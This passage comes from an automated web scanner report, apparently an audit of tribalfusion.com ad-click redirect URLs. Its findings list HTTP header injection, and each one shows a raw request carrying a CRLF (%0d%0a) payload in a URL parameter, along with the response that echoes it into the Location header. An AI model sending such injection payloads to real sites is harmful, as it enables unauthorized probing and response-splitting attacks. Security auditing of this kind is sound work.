Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:05 GMT;
Content-Type: text/html
Location: ;ord=7ac8c
46bc1d03be4

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.82. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload d1d25%0d%0aa6bf3daf369 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=d1d25%0d%0aa6bf3daf369 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=d1d25
a6bf3daf369

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.83. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload 6be6d%0d%0a319c4e9da96 was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/6be6d%0d%0a319c4e9da96/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:01 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/6be6d
319c4e9da96
/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.84. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload 666e5%0d%0a192a02a2baf was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/666e5%0d%0a192a02a2baf/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:18 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/666e5
192a02a2baf
/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.85. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload cfa7e%0d%0ae6cd7c479db was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/cfa7e%0d%0ae6cd7c479db/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/cfa7e
e6cd7c479db
/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.86. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload da7af%0d%0ad7c94f7af3e was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/da7af%0d%0ad7c94f7af3e/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/da7af
d7c94f7af3e
/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.87. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload e9019%0d%0ad83d5d2d9a9 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/e9019%0d%0ad83d5d2d9a9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:08 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/e9019
d83d5d2d9a9
/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.88. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload a2350%0d%0a75336dd4efc was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/a2350%0d%0a75336dd4efc/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:20 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/a2350
75336dd4efc
/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.89. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload dee83%0d%0a6de87aa61b3 was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/dee83%0d%0a6de87aa61b3/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=apnFNfRkP6sAeCnM78ThQZcqPBHtrraZbSTRTZaxKPlHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8ZciRwwLZa3JYbnZafG45PvWwGatZbMytdgEvXlSvq8otAugu1CMIvGIrthJVCvyBodgpRie5UQg9MBouk7vNuHVxPGSDPO6QeTa3Rk4v12VZcZbi5FiZdWLCHNhrC1yCkRoldOxejZbVJQddb1chXju5l3f2DfYGVeZcLnHpHQA7ERxNFYZdpR1UhZbxqcygBLWGKEF4xyF3hP01u4cgs57JZcS3P7JsY9MGH9VaZaec9Fxtj6dE6DoUyRZb5Zb6fRS4SqZdnoRyXI4SZdETFPF9NbZbm3XMNbWinrBt46wdJZc2ZbXedMZabWEoCij3dLGikaajW34BYiAuLXywJSTNxwiguL9g7WUPyljk0ZaEn7g6K03i43aMtXACCJq5Xw49UnBTAIYiG7MDjDn6FEdNidNMjCHWJbrWZcmrVl84ZcF1wRWsbSZaQPtcodpSbu2lvQbB0jLhSqN3bFcfkVOiWj8BbhRY88i; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/dee83
6de87aa61b3
/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.90. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 55231%0d%0a41eb9b5b7e2 was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/55231%0d%0a41eb9b5b7e2/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:00 GMT;
Content-Type: text/html
